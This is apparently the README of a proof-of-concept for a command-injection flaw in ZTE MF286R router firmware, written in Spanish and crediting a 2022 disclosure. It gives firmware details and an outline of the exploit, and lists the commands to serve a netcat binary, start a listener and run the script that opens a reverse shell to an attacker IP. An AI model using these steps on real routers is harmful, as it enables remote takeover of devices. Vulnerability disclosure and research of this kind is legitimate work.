
Prueba de concepto para la vulnerabilidad de inyección de comandos que afecta al router ZTE MF286R, incluyendo un exploit de RCE.
Detalles del firmware:
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10
pip install requests)La vulnerabilidad es una inyección de comandos compartida entre el binario zte_net_link_detect y el manejador WATCH_DOG_SWITCH en el binario del servidor web goahead.
Tenga en cuenta que la vulnerabilidad solo puede explotarse cuando el router está conectado a la WAN o a Internet a través de una tarjeta SIM. (El valor de la clave "ppp_status" debe ser "ppp_connected" o "ipv4_ipv6_connected" o "ipv6_connected").
La idea del exploit es descargar el binario estático de netcat desde un servidor http y luego abrir una reverse shell con él. P.D.: El netcat incluido en esta carpeta es big endian.
python3 -m http.server 80809999 con nc -lvp 9999python3 exploit.py http://<router> <admin_password> <attacker_ip, ej: 192.168.1.101>Esta vulnerabilidad fue reportada por Andrea Maugeri en septiembre de 2022. https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664